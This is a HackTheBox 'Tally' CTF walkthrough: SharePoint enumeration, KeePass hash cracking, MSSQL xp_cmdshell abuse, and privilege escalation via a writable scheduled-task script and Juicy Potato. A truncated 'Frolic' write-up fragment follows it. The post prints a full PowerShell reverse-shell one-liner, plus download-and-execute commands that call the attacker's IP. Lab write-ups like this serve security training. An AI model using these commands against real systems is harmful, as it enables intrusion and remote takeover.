
HacktheBox - Tally - Retired


Recon



Let's use threader3000 for our recon scan. It's a threaded scanner written in Python that does a very quick up/down scan of all TCP ports, then suggests an nmap scan based on the results. It automatically saves the nmap results as XML, which we can then convert to HTML:


xsltproc tally.htb/tally.htb.xml -o ./tally.html


There are a lot of open ports on this box

21,80,81,445,808,1433,5985,15567,32843,32844,32846,47001,49664,49665,49666,49667,49668,49669,49670




Looks like this is a Windows box with SMB, SQL, HTTP and a bunch of RPC ports.


Let's start by checking out SMB to see if we can get any info out of it.



smbclient -L 10.10.10.59



Nope nothing open to anonymous users.


What about the ftp?



Same story nothing to anonymous users.



According to our nmap output, port 80 is a SharePoint site; let's check it out next.



It does look like a SharePoint site.


The only thing we can do here is log in. Let's try admin/admin.


That didn't let us in, but we captured this in Burp.


There is some base64 here in the Authorization field.




[decoded Authorization header: an NTLMSSP message whose readable UTF-16 strings are the username admin, the workstation name WORKSTATION and the target name TALLY; the remaining bytes are binary and did not survive extraction]


Ok. 
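As an added example (not part of the original post), here is a small parser for that Authorization header: it decodes the base64, checks the NTLMSSP signature and, for a Type 3 (AUTHENTICATE) message, pulls out the domain, user and workstation the client claimed, which is exactly what someone reviewing proxy or web-server captures of failed logins wants from such a blob. The build_authenticate helper only constructs test data with a dummy NT response; the sample strings mirror the capture above.

```python
import base64
import struct

SIGNATURE = b"NTLMSSP\x00"
NEGOTIATE_UNICODE = 0x00000001  # payload strings are UTF-16LE when set


def _field(msg, offset):
    """Read an NTLM (Len, MaxLen, BufferOffset) descriptor and return its bytes."""
    length, _maxlen, buf_off = struct.unpack_from("<HHI", msg, offset)
    if buf_off + length > len(msg):
        raise ValueError("field points outside the message")
    return msg[buf_off:buf_off + length]


def parse_ntlm_header(header_value):
    """Parse the value of an 'Authorization: NTLM <base64>' header.

    Returns {'type': n} for Type 1/2 messages and, for a Type 3
    (AUTHENTICATE) message, also the domain, user and workstation the
    client claimed plus the length of its NT response. Raises
    ValueError on anything that is not a well-formed NTLMSSP message.
    """
    scheme, _, b64 = header_value.strip().partition(" ")
    if scheme.upper() != "NTLM":
        raise ValueError("not an NTLM authorization header")
    msg = base64.b64decode(b64)
    if len(msg) < 12 or msg[:8] != SIGNATURE:
        raise ValueError("missing NTLMSSP signature")
    msg_type = struct.unpack_from("<I", msg, 8)[0]
    info = {"type": msg_type}
    if msg_type != 3:
        return info
    if len(msg) < 64:
        raise ValueError("truncated AUTHENTICATE message")
    flags = struct.unpack_from("<I", msg, 60)[0]
    enc = "utf-16-le" if flags & NEGOTIATE_UNICODE else "latin-1"
    # Descriptor offsets from MS-NLMP: LM 12, NT 20, Domain 28, User 36,
    # Workstation 44, SessionKey 52, NegotiateFlags 60.
    info["domain"] = _field(msg, 28).decode(enc)
    info["user"] = _field(msg, 36).decode(enc)
    info["workstation"] = _field(msg, 44).decode(enc)
    info["nt_response_len"] = len(_field(msg, 20))
    return info


def build_authenticate(domain, user, workstation, nt_response=b"\x00" * 24):
    """Construct a minimal Type 3 message for testing (dummy NT response,
    no real credentials) and return the full header value."""
    parts = [b"", nt_response, domain.encode("utf-16-le"),
             user.encode("utf-16-le"), workstation.encode("utf-16-le"), b""]
    header_len = 64  # signature + type + six descriptors + flags
    descriptors, payload = b"", b""
    for data in parts:
        descriptors += struct.pack("<HHI", len(data), len(data), header_len + len(payload))
        payload += data
    msg = SIGNATURE + struct.pack("<I", 3) + descriptors + struct.pack("<I", NEGOTIATE_UNICODE) + payload
    return "NTLM " + base64.b64encode(msg).decode()


if __name__ == "__main__":
    # Constructed sample mirroring the strings seen in the decoded capture above.
    sample = build_authenticate("TALLY", "admin", "WORKSTATION")
    print(parse_ntlm_header(sample))
```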


Let's see if we can find anything else available to us on this port. Let's run a dirb-style brute force to find any other directories or files we might have access to.


The folks over at Bishop Fox have a brute force tool tailored for SharePoint, so let's download the Perl script and the extensions file:


https://resources.bishopfox.com/resources/tools/sharepoint-hacking-diggity/attack-tools/



perl SharePointURLBrute\ v1.1.pl -a "http://tally.htb" -e SharePoint-UrlExtensions-18Mar2012.txt



Starting search for common SharePoint Pages
Start Time: Fri Oct 16 13:25:48 2020

FOUND: http://tally.htb/_catalogs/masterpage/Forms/AllItems.aspx
FOUND: http://tally.htb/_catalogs/wp/Forms/AllItems.aspx
FOUND: http://tally.htb/_layouts/AreaNavigationSettings.aspx
FOUND: http://tally.htb/_Layouts/AreaTemplateSettings.aspx
FOUND: http://tally.htb/_Layouts/AreaWelcomePage.aspx
FOUND: http://tally.htb/_Layouts/ChangeSiteMasterPage.aspx
FOUND: http://tally.htb/_layouts/MyInfo.aspx
FOUND: http://tally.htb/_layouts/MyPage.aspx
FOUND: http://tally.htb/_layouts/PageSettings.aspx
FOUND: http://tally.htb/_layouts/policy.aspx
FOUND: http://tally.htb/_layouts/policyconfig.aspx
FOUND: http://tally.htb/_layouts/policycts.aspx
FOUND: http://tally.htb/_layouts/Policylist.aspx
FOUND: http://tally.htb/_Layouts/RedirectPage.aspx?Target={SiteCollectionUrl}_catalogs/masterpage
FOUND: http://tally.htb/_layouts/SiteDirectorySettings.aspx
FOUND: http://tally.htb/_layouts/sitemanager.aspx
FOUND: http://tally.htb/_Layouts/SiteManager.aspx?lro=all
FOUND: http://tally.htb/_vti_bin/alerts.asmx
FOUND: http://tally.htb/_vti_bin/dspsts.asmx
FOUND: http://tally.htb/_vti_bin/forms.asmx
FOUND: http://tally.htb/_vti_bin/Lists.asmx
FOUND: http://tally.htb/_vti_bin/people.asmx
FOUND: http://tally.htb/_vti_bin/Permissions.asmx
FOUND: http://tally.htb/_vti_bin/search.asmx
FOUND: http://tally.htb/_vti_bin/UserGroup.asmx
FOUND: http://tally.htb/_vti_bin/versions.asmx
FOUND: http://tally.htb/_vti_bin/Views.asmx
FOUND: http://tally.htb/_vti_bin/webpartpages.asmx
FOUND: http://tally.htb/_vti_bin/webs.asmx
FOUND: http://tally.htb/_vti_bin/SharepointEmailWS.asmx
FOUND: http://tally.htb/_vti_bin/spsearch.asmx
FOUND: http://tally.htb/_vti_bin/WebPartPages.asmx
FOUND: http://tally.htb/default.aspx
FOUND: http://tally.htb/shared documents/forms/allitems.aspx


Search Complete
Total # of SP Admin URLs Found: 34
Finish Time: Fri Oct 16 13:28:01 2020






The last result here is interesting:


FOUND: http://tally.htb/shared documents/forms/allitems.aspx





We can open ftp-details.docx in an online viewer to see its contents:


https://products.groupdocs.app/viewer/view?FolderName=c4107c6c-5b7f-4eae-80ed-c31027ee84fa&FileName=ftp-details.docx



 UTDRSCH53c"$6hys

So we have a password but no username.




Luckily another page gives us some more info:


http://tally.htb/SitePages/FinanceTeam.aspx



Alright, now we've got a username too: ftp_users.




Let's use FileZilla to download all the files here in case there is more data in them.


There are some to-do notes in the IT users' folders, Sarah and Tim:


Sarah


done

install Sharepoint, replace Orchard CMS

to do

uninstall SQL Server 2016


Tim



To do:

Remove migration folder
Set secure share permissions

encrypted share creds:

password in keepass


Password in keepass? That sounds promising.

In his folder we do see a tim.kdbx file which could be a keepass database for Tim.


Let's transfer this over to a windows box since keepass is a windows program.


If we try to open the kdbx we get this.



We need a password….


Let's see if we can use John the Ripper to get it.


Here is a blog that describes the steps:

https://tzusec.com/tag/keepass2john/



First we need to format this in a way that John likes; we can use the bundled keepass2john utility:


/usr/sbin/keepass2john  ./tim.kdbx


This gives us the output below, which we save to a file called keepasshash:



/usr/sbin/keepass2john  ./tim.kdbx
tim:$keepass$*2*6000*0*f362b5565b916422607711b54e8d0bd20838f5111d33a5eed137f9d66a375efb*3f51c5ac43ad11e0096d59bb82a59dd09cfd8d2791cadbdb85ed3020d14c8fea*3f759d7011f43b30679a5ac650991caa*b45da6b5b0115c5a7fb688f8179a19a749338510dfe90aa5c2cb7ed37f992192*535a85ef5c9da14611ab1c1edc4f00a045840152975a4d277b3b5c4edc1cd7da
circusmonkey404@kali:~/Desktop/HTB/tally$ /usr/sbin/keepass2john  ./tim.kdbx  > keepasshash


sudo john --wordlist=/usr/share/wordlists/rockyou.txt keepasshash



It should only take a minute or two to get the password out.





simplementeyo


There were a couple of passwords in the database, but one jumps out:



Tally Acct Share


Finance
Acc0unting



Let's bounce back to SMB now that we have some creds that should work there.



smbclient -U "Finance" -L \\\\tally.htb





There is an ACCT share and some admin shares. Let's try the admin shares first, just in case.



Nope.


Okay, what about the ACCT share?



Some folders here to check out.


Under zz_Archived/SQL we find this file, conn-info.txt:



old server details

db: sa
pass: YE%TJC%&HYbe5Nw

have changed for tally



Looks like this used to be the SA password for SQL, but the note says it has been changed.



Another interesting finding that probably won't help us own this box: apparently they have a spreadsheet of all their customers along with their credit card numbers. I don't think these guys are PCI compliant.




Let's keep poking around..




In the acct/zz_Migration/Binaries/New folder/ we can see a bunch of executables and one with an interesting name of tester.exe.


Let's grab a copy and see what it is.




Let's run strings against it to see if it leaks what it is or what it does.



strings ./tester.exe


Looks like we have another possible SA password:


GWE3V65#6KFH93@4GWTG2G


Let's use a tool called mssql-cli to connect:


https://github.com/dbcli/mssql-cli


mssql-cli -S tally.htb -U sa -P GWE3V65#6KFH93@4GWTG2G

Let's first see what databases are on the server.


select name FROM master.dbo.sysdatabases;



+--------+
| name   |
|--------|
| master |
| tempdb |
| model  |
| msdb   |
+--------+
(4 rows affected)
master> ;                                                                                                                              
Time: 0.263s
Commands completed successfully


Ok we have master, tempdb, model and msdb


Let's see about tables in these databases


 select * From  master.Information_schema.tables;



There are some tables in master, nothing in tempdb or model, but a whole lot in msdb (which is expected, since it's the workhorse DB for MSSQL).


We can find the next command on this site, which is a good resource for looking at MSSQL:


https://book.hacktricks.xyz/pentesting/pentesting-mssql-microsoft-sql-server


It even gives a pro tip: whoever is running MSSQL most likely has SeImpersonatePrivilege, and is probably vulnerable to a Juicy Potato attack.





select sp.name as login, sp.type_desc as login_type, sl.password_hash, sp.create_date, sp.modify_date, case when sp.is_disabled = 1 then 'Disabled' else 'Enabled' end as status from sys.server_principals sp left join sys.sql_logins sl on sp.principal_id = sl.principal_id where sp.type not in ('G', 'R') order by sp.name;




Time: 0.973s
+-----------------------------------------+--------------------------+----------------------------------------------------------------->
| login                                   | login_type               | password_hash                                                   >
|-----------------------------------------+--------------------------+----------------------------------------------------------------->
| ##MS_AgentSigningCertificate##          | CERTIFICATE_MAPPED_LOGIN | NULL                                                            >
| ##MS_PolicyEventProcessingLogin##       | SQL_LOGIN                | 0x0200FED454A573B2B9C22F7EB4C935ED6179BDFA683198E434D863C5ED7477>
| ##MS_PolicySigningCertificate##         | CERTIFICATE_MAPPED_LOGIN | NULL                                                            >
| ##MS_PolicyTsqlExecutionLogin##         | SQL_LOGIN                | 0x0200DE379F4D9E833E9D4EA1984B69137BE6AEF4FF126C2A2C4A436D2DCDAB>
| ##MS_SmoExtendedSigningCertificate##    | CERTIFICATE_MAPPED_LOGIN | NULL                                                            >
| ##MS_SQLAuthenticatorCertificate##      | CERTIFICATE_MAPPED_LOGIN | NULL                                                            >
| ##MS_SQLReplicationSigningCertificate## | CERTIFICATE_MAPPED_LOGIN | NULL                                                            >
| ##MS_SQLResourceSigningCertificate##    | CERTIFICATE_MAPPED_LOGIN | NULL                                                            >
| NT AUTHORITY\SYSTEM                     | WINDOWS_LOGIN            | NULL                                                            >
| NT SERVICE\MSSQLSERVER                  | WINDOWS_LOGIN            | NULL                                                            >
| NT SERVICE\SQLSERVERAGENT               | WINDOWS_LOGIN            | NULL                                                            >
| NT SERVICE\SQLTELEMETRY                 | WINDOWS_LOGIN            | NULL                                                            >
| NT SERVICE\SQLWriter                    | WINDOWS_LOGIN            | NULL                                                            >
| NT SERVICE\Winmgmt                      | WINDOWS_LOGIN            | NULL                                                            >
| sa                                      | SQL_LOGIN                | 0x020077CC3CBB58A009A68DB558EB136EF1EB8CBCBFD2654A2AFB1F682F3020>
| WIN-A1D9PN09GFO\Sarah                   | WINDOWS_LOGIN            | NULL                                                            >
+-----------------------------------------+--------------------------+----------------------------------------------------------------->



There is a hash here for the sa account, but we already know that password. It looks like Sarah has a login here too, but no hash is stored for it.



Poking around in the DBs we can't really find anything interesting.




Exploit


However, since we have SA on this DB we might be able to use it to run commands on the box.


https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-ver15



xp_cmdshell { 'command_string' } [ , no_output ] 



Looks like xp_cmdshell is not enabled. But we are sa and can do whatever we want, so let's enable it. :)


https://docs.microsoft.com/en-us/sql/database-engine/configure-windows/xp-cmdshell-server-configuration-option?view=sql-server-ver15



-- To allow advanced options to be changed. 
EXECUTE sp_configure 'show advanced options', 1; 
GO 
-- To update the currently configured value for advanced options. 
RECONFIGURE; 
GO 
-- To enable the feature. 
EXECUTE sp_configure 'xp_cmdshell', 1; 
GO 
-- To update the currently configured value for this feature. 
RECONFIGURE; 
GO  





Much better



Let's get a real shell 


We'll use Nishang's Invoke-PowerShellTcp.ps1


First download the file or clone the git if you don't already have it.


https://github.com/samratashok/nishang


Copy Invoke-PowershellTCP.ps1 to a folder you want to serve it from.


Add this line to the bottom of the script so it will run after download (with your VPN IP and choice of port):



Invoke-PowerShellTCP -Reverse -IPAddress 10.10.14.16 -Port 5555


Next we need to set up a listener on our Kali box:



nc -lnvp 5555


Then on our SA connection to Tally we run:



xp_cmdshell "powershell -c iex(new-object net.webclient).downloadstring('http://10.10.14.16:9090/Invoke-PowerShellTcp.ps1')"


** There is a process here re-disabling xp_cmdshell, so you might need to redo that part if you are going too slow. *******


With any luck we should get a PowerShell reverse shell back now.



And we can get our user.txt now



Now we just need to escalate. Remember the tip the other site gave us earlier about our user maybe having SeImpersonatePrivilege?


Let's check.




Yup


Ok so we should be able to use a potato priv esc here.


But let's poke around and see if there is another path.


Look at these two files: SPBestWarmUp.ps1 and SPBestWarmUp.xml.



PS C:\users\Sarah\Desktop> type SPBestWarmup.xml
<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <CalendarTrigger>
      <Repetition>
        <Interval>PT1H</Interval>
        <Duration>P1D</Duration>
        <StopAtDurationEnd>false</StopAtDurationEnd>
      </Repetition>
      <StartBoundary>2017-01-25T01:00:00</StartBoundary>
      <Enabled>true</Enabled>
      <ScheduleByDay>
        <DaysInterval>1</DaysInterval>
      </ScheduleByDay>
    </CalendarTrigger>
    <EventTrigger>
      <Enabled>true</Enabled>
      <Subscription>&lt;QueryList&gt;&lt;Query Id="0" Path="System"&gt;&lt;Select Path="System"&gt;*[System[Provider[@Name='Microsoft-Windows-IIS-IISReset'] and EventID=3201]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>
      <Delay>PT1M</Delay>
    </EventTrigger>
    <EventTrigger>
      <Enabled>true</Enabled>
      <Subscription>&lt;QueryList&gt;&lt;Query Id="0" Path="System"&gt;&lt;Select Path="System"&gt;*[System[Provider[@Name='Microsoft-Windows-WAS'] and EventID=5074]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>
      <Delay>PT1M</Delay>
    </EventTrigger>
    <EventTrigger>
      <Enabled>true</Enabled>
      <Subscription>&lt;QueryList&gt;&lt;Query Id="0" Path="System"&gt;&lt;Select Path="System"&gt;*[System[Provider[@Name='Microsoft-Windows-WAS'] and EventID=5075]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>
      <Delay>PT1M</Delay>
    </EventTrigger>
    <EventTrigger>
      <Enabled>true</Enabled>
      <Subscription>&lt;QueryList&gt;&lt;Query Id="0" Path="System"&gt;&lt;Select Path="System"&gt;*[System[Provider[@Name='Microsoft-Windows-WAS'] and EventID=5076]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>
      <Delay>PT1M</Delay>
    </EventTrigger>
    <EventTrigger>
      <Enabled>true</Enabled>
      <Subscription>&lt;QueryList&gt;&lt;Query Id="0" Path="System"&gt;&lt;Select Path="System"&gt;*[System[Provider[@Name='Microsoft-Windows-WAS'] and EventID=5077]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>
      <Delay>PT1M</Delay>
    </EventTrigger>
    <EventTrigger>
      <Enabled>true</Enabled>
      <Subscription>&lt;QueryList&gt;&lt;Query Id="0" Path="System"&gt;&lt;Select Path="System"&gt;*[System[Provider[@Name='Microsoft-Windows-WAS'] and EventID=5078]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>
      <Delay>PT1M</Delay>
    </EventTrigger>
    <EventTrigger>
      <Enabled>true</Enabled>
      <Subscription>&lt;QueryList&gt;&lt;Query Id="0" Path="System"&gt;&lt;Select Path="System"&gt;*[System[Provider[@Name='Microsoft-Windows-WAS'] and EventID=5079]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>
      <Delay>PT1M</Delay>
    </EventTrigger>
    <EventTrigger>
      <Enabled>true</Enabled>
      <Subscription>&lt;QueryList&gt;&lt;Query Id="0" Path="System"&gt;&lt;Select Path="System"&gt;*[System[Provider[@Name='Microsoft-Windows-WAS'] and EventID=5080]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>
    </EventTrigger>
    <EventTrigger>
      <Enabled>true</Enabled>
      <Subscription>&lt;QueryList&gt;&lt;Query Id="0" Path="System"&gt;&lt;Select Path="System"&gt;*[System[Provider[@Name='Microsoft-Windows-WAS'] and EventID=5081]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>
      <Delay>PT1M</Delay>
    </EventTrigger>
    <EventTrigger>
      <Enabled>true</Enabled>
      <Subscription>&lt;QueryList&gt;&lt;Query Id="0" Path="System"&gt;&lt;Select Path="System"&gt;*[System[Provider[@Name='Microsoft-Windows-WAS'] and EventID=5117]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>
      <Delay>PT1M</Delay>
    </EventTrigger>
    <EventTrigger>
      <Enabled>true</Enabled>
      <Subscription>&lt;QueryList&gt;&lt;Query Id="0" Path="System"&gt;&lt;Select Path="System"&gt;*[System[Provider[@Name='Microsoft-Windows-WAS'] and EventID=5186]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>
      <Delay>PT1M</Delay>
    </EventTrigger>
    <BootTrigger>
      <Enabled>true</Enabled>
      <Delay>PT5M</Delay>
    </BootTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <UserId>TALLY\Administrator</UserId>
      <LogonType>Password</LogonType>
      <RunLevel>HighestAvailable</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>
    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
    <AllowHardTerminate>true</AllowHardTerminate>
    <StartWhenAvailable>false</StartWhenAvailable>
    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
    <IdleSettings>
      <StopOnIdleEnd>true</StopOnIdleEnd>
      <RestartOnIdle>false</RestartOnIdle>
    </IdleSettings>
    <AllowStartOnDemand>true</AllowStartOnDemand>
    <Enabled>true</Enabled>
    <Hidden>false</Hidden>
    <RunOnlyIfIdle>false</RunOnlyIfIdle>
    <WakeToRun>false</WakeToRun>
    <ExecutionTimeLimit>P3D</ExecutionTimeLimit>
    <Priority>7</Priority>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>PowerShell.exe</Command>
      <Arguments>-ExecutionPolicy Bypass -File SPBestWarmUp.ps1 -skipadmincheck</Arguments>
      <WorkingDirectory>C:\Users\Sarah\Desktop</WorkingDirectory>
    </Exec>
  </Actions>
</Task>

This sure looks like the XML for a scheduled task, and even better, it looks like one that runs as Administrator.




And it's just running this PowerShell file on Sarah's Desktop.


So if we overwrite the file, it will run what we want it to run as Administrator.
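The weakness in that task is the combination of a privileged principal (TALLY\Administrator at HighestAvailable) with a script that lives in a directory another user can write to. As an added example (not from the original post), here is an audit function that parses exported Task Scheduler XML and flags exactly that pattern; the embedded SAMPLE_TASK is a constructed, shortened copy of the task above, and the profile-owner rule (any path under C:\Users\<name>) is this example's own heuristic.

```python
import ntpath
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# Heuristic: anything under a user profile is writable by that user.
PROFILE_RE = re.compile(r"^[a-z]:\\users\\([^\\]+)\\", re.IGNORECASE)

# Constructed sample, trimmed from the SPBestWarmUp task shown above.
SAMPLE_TASK = """<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><Repetition><Interval>PT1H</Interval></Repetition>
    <StartBoundary>2017-01-25T01:00:00</StartBoundary><Enabled>true</Enabled>
    <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></CalendarTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>TALLY\\Administrator</UserId>
    <LogonType>Password</LogonType><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Actions Context="Author"><Exec><Command>PowerShell.exe</Command>
    <Arguments>-ExecutionPolicy Bypass -File SPBestWarmUp.ps1 -skipadmincheck</Arguments>
    <WorkingDirectory>C:\\Users\\Sarah\\Desktop</WorkingDirectory></Exec></Actions>
</Task>"""


def _text(node, path):
    """Stripped text of a child element, or '' when absent."""
    if node is None:
        return ""
    return node.findtext(path, default="", namespaces=NS).strip()


def _script_path(args, working_dir):
    """Return the script named by a '-File <path>' argument, resolved
    against WorkingDirectory when relative; None if there is no -File."""
    m = re.search(r"-File\s+\"?([^\"\s]+)", args, re.IGNORECASE)
    if not m:
        return None
    path = m.group(1)
    return path if ntpath.isabs(path) else ntpath.join(working_dir, path)


def audit_task(xml_text):
    """Flag Exec actions that run elevated but execute a program or script
    stored in another user's profile. Returns a list of finding strings."""
    # Exported task XML declares UTF-16; once it is already a str the
    # declaration is dropped so ElementTree does not second-guess it.
    xml_text = re.sub(r"^\s*<\?xml[^>]*\?>", "", xml_text).strip()
    root = ET.fromstring(xml_text)
    principal = root.find("t:Principals/t:Principal", NS)
    run_as = _text(principal, "t:UserId")
    run_level = _text(principal, "t:RunLevel")
    account = run_as.split("\\")[-1].lower()
    elevated = run_level == "HighestAvailable" or account in {"administrator", "system"}
    findings = []
    for ex in root.findall("t:Actions/t:Exec", NS):
        command = _text(ex, "t:Command")
        args = _text(ex, "t:Arguments")
        workdir = _text(ex, "t:WorkingDirectory")
        for path in (command, _script_path(args, workdir)):
            owner = PROFILE_RE.match(path or "")
            if elevated and owner and owner.group(1).lower() != account:
                findings.append(f"runs as {run_as} ({run_level}) but executes {path} "
                                f"from {owner.group(1)}'s profile")
    return findings


if __name__ == "__main__":
    for finding in audit_task(SAMPLE_TASK):
        print(finding)
```

Moving the script to a location only administrators can write (and verifying that with the same audit) makes the finding disappear; that is the fix an administrator would apply to this task.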


Let's try it.


We had good luck with our first reverse PowerShell, so let's just modify it to use a different port and overwrite the file with it. We just need to rename it to something else (I added -Admin to the end) and modify the last line to invoke a different port from the one we are already using:






Invoke-PowerShellTCP -Reverse -IPAddress 10.10.14.16 -Port 5666


Let's start a new listener for that port:



nc -lnvp 5666



Then overwrite the ps1 on her desktop with a new ps1 containing just this line:



iex(new-object net.webclient).downloadstring('http://10.10.14.16:9090/Invoke-PowerShellTcp-Admin.ps1')



We can use echo to overwrite the file on Tally:




echo "iex(new-object net.webclient).downloadstring('http://10.10.14.16:9090/Invoke-PowerShellTcp-Admin.ps1')" > SPBestWarmUp.ps1



Now we just need to wait for the task to fire.


Here comes the bad news with this method…. 


The PT1H repetition interval in the task XML means it only runs once an hour, which really sucks for me because I missed a quotation mark the first time I tried this and had to wait almost two full hours.



Theoretically this should work if the Administrator account is running this scheduled task, but I'm done waiting for it. Let's potato this bad boy.





Let's use the same path we used on Bounty.


Grab a copy of Juicy Potato:


https://github.com/ohpe/juicy-potato/releases



Use certutil to download it to Tally:




certutil.exe -urlcache -f http://10.10.14.16:9090/JuicyPotato.exe JuicyPotato.exe


Create a bat file for a reverse shell; I used a PowerShell one-liner here.


I created it on Kali and used certutil and updog to download it to Tally:



powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.16',5666);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (IEX $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"



Then I just ran Juicy Potato using the defaults and pointed it at RShell.bat:



C:\temp\JuicyPotato.exe -l 1337 -p C:\temp\RShell.bat -t *





And there we go, we got our root flag.
















HacktheBox - Retired - Frolic Recon Let's start out with a threader3000 scan Some interesting results here Port 22 and 445 aren't uncommon… but 1880 and 9999 are.. Let's let nmap run through these ports  Option Selection: 1 nmap -p22,445,1880,9999 -sV -sC -T4 -Pn -oA 10.10.10.111 10.10.10.111 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-05 16:17 EDT Nmap scan report for 10.10.10.111 Host is up (0.060s latency). PORT     STATE SERVICE     VERSION 22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |   2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA) |   256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA) |_  256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519) 445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 1880/tcp open  http        Node.js (Express middlewar